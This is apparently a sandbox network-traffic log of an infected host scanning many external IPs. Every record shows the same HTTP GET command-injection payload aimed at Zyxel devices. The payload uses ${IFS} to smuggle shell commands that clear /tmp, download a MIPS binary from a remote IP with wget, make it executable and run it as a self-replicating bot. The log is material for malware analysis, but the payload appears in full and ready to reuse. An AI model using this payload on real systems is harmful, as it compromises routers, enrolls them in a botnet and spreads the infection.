                                                Jan 12, 2024 18:23:52.303462982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                140192.168.2.1334870132.236.75.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303473949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                141192.168.2.1341486223.200.170.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303477049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.1356948166.128.70.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303494930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                143192.168.2.1344860218.102.162.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303559065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                144192.168.2.1356450143.65.231.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303620100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                145192.168.2.1340558113.233.46.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303683043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                146192.168.2.1333244217.111.136.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303705931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                147192.168.2.1355062133.241.237.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303734064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                148192.168.2.1354260156.185.0.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304590940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                149192.168.2.136004299.38.3.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304673910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                150192.168.2.134577412.178.8.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304677963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                151192.168.2.1333504118.158.181.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304698944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                152192.168.2.134280248.82.77.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304702044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                153192.168.2.1343716146.208.147.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304704905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                154192.168.2.134867688.49.139.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304709911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                155192.168.2.13601868.192.207.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304790020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                156192.168.2.1335784221.139.128.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304852009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                157192.168.2.133366467.9.45.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304851055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                158192.168.2.133959295.162.170.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304852962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                159192.168.2.1350426213.110.212.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304851055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                160192.168.2.1339864156.109.222.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304888964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                161192.168.2.1359638192.162.80.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304946899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                162192.168.2.1358814135.226.118.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304994106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                163192.168.2.133756682.202.93.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.304995060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                164192.168.2.134296424.137.75.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305059910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                165192.168.2.1335052126.47.101.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305063963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                166192.168.2.1357402135.70.206.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305130959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                167192.168.2.1354986147.87.149.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305143118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                168192.168.2.1343972159.167.198.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305177927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                169192.168.2.135692636.66.127.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305201054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                170192.168.2.134346460.79.245.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305213928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                171192.168.2.1347516198.230.6.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305259943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                172192.168.2.135647886.134.117.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305259943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                173192.168.2.133811286.14.225.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305273056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                174192.168.2.1357844183.232.174.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305342913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                175192.168.2.1356698183.134.39.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305349112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                176192.168.2.135283064.114.151.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305423975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                177192.168.2.133904484.7.157.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305443048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                178192.168.2.1341926212.137.218.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305512905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                179192.168.2.1356540216.172.236.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305515051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                180192.168.2.1354918187.207.45.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305526972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                181192.168.2.135851072.12.46.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305644989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                182192.168.2.1337814196.74.95.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305665016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                183192.168.2.1346652206.231.149.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305680037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                184192.168.2.1348900128.102.216.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305725098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                185192.168.2.1347834185.41.160.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305747986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                186192.168.2.1357584158.43.6.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305761099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                187192.168.2.134748834.77.202.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305814981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                188192.168.2.1339000134.195.35.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305815935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                189192.168.2.1337218146.165.80.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305819988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                190192.168.2.1340628147.31.200.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305824995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                191192.168.2.1343104164.18.192.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305824995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                192192.168.2.1342030170.246.19.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305862904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                193192.168.2.1342346138.151.45.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305933952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                194192.168.2.1355432198.162.14.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305974007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                195192.168.2.1359230198.213.168.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305986881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                196192.168.2.1341604223.1.216.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305988073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                197192.168.2.1351778216.106.134.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.305999041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                198192.168.2.1358556133.161.19.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306096077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                199192.168.2.1334644165.222.248.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306159973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                200192.168.2.1355128176.238.115.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306159973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                201192.168.2.135008643.145.28.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306162119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                202192.168.2.1332922120.176.250.89443
                                                TimestampBytes transferredDirectionData
